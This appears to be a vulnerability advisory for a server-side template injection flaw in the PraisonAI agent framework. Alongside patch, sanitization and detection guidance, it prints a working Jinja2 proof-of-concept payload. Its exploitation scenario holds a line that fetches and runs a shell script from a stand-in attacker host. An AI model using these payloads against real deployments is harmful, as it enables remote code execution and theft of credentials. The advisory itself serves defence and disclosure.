PraisonAI contains a server-side template injection (SSTI) vulnerability: user-controlled input passed to agent.start() is rendered directly through Jinja2-style templates without sanitization, enabling arbitrary OS command execution on the host with the process's full privileges. With a CVSS of 8.8 (network-accessible, low privileges required, no user interaction), the blast radius covers any deployment where agent instructions are user-supplied: SaaS platforms, internal tooling, and agentic pipelines built on PraisonAI. The framework's default auto-approval mode removes the human-in-the-loop safeguard that might otherwise block file operations. A working PoC using standard Jinja2 payloads is publicly documented in the advisory, making exploitation trivially reproducible without deep AI/ML expertise, and the package carries nine other CVEs signaling persistent security debt. Patch immediately to praisonai>=4.5.115; if patching is delayed, switch approval_mode away from 'auto', strip template syntax from user input, and isolate agent processes with minimal OS privileges.
Risk Assessment
High risk. CVSS 8.8 with low-privilege network access, no user interaction required, and a published PoC using standard Jinja2 SSTI payloads make this trivially exploitable by any authenticated user. The auto-approval mode (`approval_mode="auto"`) eliminates the last procedural safeguard against unauthorized file operations. Any service exposing agent.start() to external input, directly or via API, is fully compromisable. Nine prior CVEs in the same package indicate a pattern of insufficient security review in this codebase, increasing confidence that additional attack surface exists.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| praisonai | pip | <= 4.5.114 | 4.5.115 |
Do you use praisonai? You're affected.
Recommended Action
- PATCH: Upgrade praisonai to version 4.5.115 immediately — this is the authoritative fix.
- WORKAROUND (if patching is delayed): Set approval_mode to manual/supervised to require human confirmation for all file operations; audit every call to agent.start() for unsanitized user input paths.
- INPUT SANITIZATION: Escape or strip Jinja2 template syntax ('{{', '}}', '{%', '%}') from user-supplied content before passing it to any agent tool. Note that Jinja2's autoescape=True only HTML-escapes rendered output; it does not stop expression evaluation when user input is compiled as the template itself, so treat it as defense-in-depth rather than a fix.
- SANDBOXING: Run PraisonAI agent processes in isolated containers with dropped capabilities (no network egress, read-only filesystem where possible, non-root UID).
- DETECTION: Alert on template expression patterns in agent inputs (regex: \{\{.*\}\}, __import__, os.system, subprocess); monitor for unexpected file creation in /tmp or world-writable directories; review process spawn logs for unusual child processes from the agent runtime.
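The input-sanitization workaround above can be sketched as follows. This is a minimal illustration, not part of the PraisonAI API; the function name and token list are illustrative, and stripping delimiters is a stopgap, not a substitute for patching.

```python
import re

# Jinja2 delimiters that must not survive in user-supplied content.
# Covers expressions ({{ }}), statements ({% %}), and comments ({# #}).
_TEMPLATE_TOKENS = re.compile(r"\{\{|\}\}|\{%|%\}|\{#|#\}")

def strip_template_syntax(user_input: str) -> str:
    """Remove Jinja2 template delimiters so any payload renders as inert text."""
    return _TEMPLATE_TOKENS.sub("", user_input)

# An SSTI probe is defanged before it ever reaches a template-rendering tool.
payload = 'Create file with content: {{ self.__init__.__globals__ }}'
print(strip_template_syntax(payload))
```

Applied before every call into the agent toolchain, this reduces crafted expressions like `{{7*7}}` to the harmless literal `7*7`.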
Technical Details
NVD Description
## Summary

Direct insertion of unescaped user input into template-rendering tools allows arbitrary code execution via specially crafted agent instructions.

## Details

The `create_agent_centric_tools()` function returns tools (like `acp_create_file`) that process file content using template rendering. When user input from `agent.start()` is passed directly into these tools without escaping (as shown in `agent_centric_example.py:85-86`), template expressions in the input are executed rather than treated as literal text. This occurs because:

1. No input sanitization or escaping is applied to user-controlled content
2. The ACP-enabled runtime auto-approves operations (`approval_mode="auto"`)
3. Tools lack context-aware escaping for template syntax

## PoC

```python
# Replace the agent.start() call at line 85 with:
result = agent.start('Create file with content: {{ self.__init__.__globals__.__builtins__.__import__("os").system("touch /tmp/pwned") }}')
```

Successful exploitation creates `/tmp/pwned`, confirming arbitrary command execution. The expression `{{7*7}}` renders as `49` instead of literal text.

## Impact

Attackers can execute arbitrary system commands with the privileges of the running process by injecting malicious template expressions through agent instructions. This compromises the host system, enabling data theft, ransomware deployment, or lateral movement.

## Recommended Fix

1. **Input Sanitization**: Implement strict whitelist validation for file content
2. **Contextual Escaping**: Auto-escape template syntax characters (e.g., `{{ }}`) in user input using Jinja2 `autoescape=True`
3. **Sandboxing**: Restrict template execution environments using secure eval modes
4. **Approval Hardening**: Require manual approval for file creation operations in production
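The root cause described above can be demonstrated in a few lines of plain Jinja2, independent of PraisonAI. In the vulnerable pattern, user input becomes the template source and its expressions are evaluated; in the safe pattern, the template is a fixed string and user input is passed as a variable, so it stays literal data. This is a standalone sketch of the general SSTI pattern, not PraisonAI's actual code path.

```python
from jinja2 import Environment

env = Environment()
user_input = "{{ 7 * 7 }}"

# Vulnerable pattern: user input is compiled as the template itself,
# so embedded expressions are evaluated and this renders "49".
vulnerable = env.from_string(user_input).render()

# Safe pattern: a fixed template receives user input as a variable,
# so the payload is emitted as the literal text "{{ 7 * 7 }}".
safe = env.from_string("{{ content }}").render(content=user_input)

print(vulnerable)  # 49
print(safe)        # {{ 7 * 7 }}
```

The same distinction explains why the `{{7*7}}` probe mentioned in the advisory is a reliable canary: a patched or correctly written code path returns it unchanged.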
Exploitation Scenario
An adversary with a low-privilege authenticated account on a platform using PraisonAI submits a crafted agent instruction: 'Create file with content: {{ self.__init__.__globals__.__builtins__.__import__("os").system("curl attacker.com/shell.sh | bash") }}'. The agent.start() call passes this string directly to acp_create_file without sanitization. The Jinja2 engine evaluates the embedded expression, executing the OS command with the web server process's privileges. With auto-approval mode active, no human review interrupts the chain. The attacker establishes a reverse shell, exfiltrates environment variables containing LLM provider API keys and database credentials, then pivots laterally into the internal AI infrastructure. The entire chain from injection to shell takes seconds and requires no specialized tooling.
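The detection guidance in the recommended actions can be sketched as a simple input screen run before instructions reach the agent runtime. The indicator list mirrors the patterns given above and is illustrative only; determined attackers can obfuscate payloads, so this complements rather than replaces patching.

```python
import re

# Indicators of Jinja2 SSTI probes and common Python-escape gadgets.
# Not exhaustive: payloads can be obfuscated or split across inputs.
SSTI_INDICATORS = [
    re.compile(r"\{\{.*\}\}", re.DOTALL),    # any template expression
    re.compile(r"__import__"),               # dynamic module import gadget
    re.compile(r"os\.system"),               # direct command execution
    re.compile(r"subprocess"),               # child-process spawning
    re.compile(r"__globals__|__builtins__"), # attribute-walk gadgets
]

def flag_suspicious_input(text: str) -> list[str]:
    """Return the regex patterns that matched, for alerting and triage."""
    return [p.pattern for p in SSTI_INDICATORS if p.search(text)]

probe = 'Create file with content: {{ self.__init__.__globals__ }}'
print(flag_suspicious_input(probe))
```

Matches should be logged and alerted on even when the input is subsequently sanitized, since they indicate an active probing attempt.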
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Related Vulnerabilities
All five are in the same package, praisonai:

| CVE | CVSS | Summary |
|---|---|---|
| CVE-2026-39890 | 9.8 | PraisonAI: YAML deserialization enables unauthenticated RCE |
| CVE-2026-39305 | 9.0 | PraisonAI: path traversal enables arbitrary file write/RCE |
| CVE-2026-34955 | 8.8 | PraisonAI: sandbox escape via shell=True blocklist bypass |
| CVE-2026-39307 | 8.1 | PraisonAI: Zip Slip enables arbitrary file write/RCE |
| CVE-2026-34936 | 7.7 | PraisonAI: SSRF via api_base steals cloud IAM credentials |
AI Threat Alert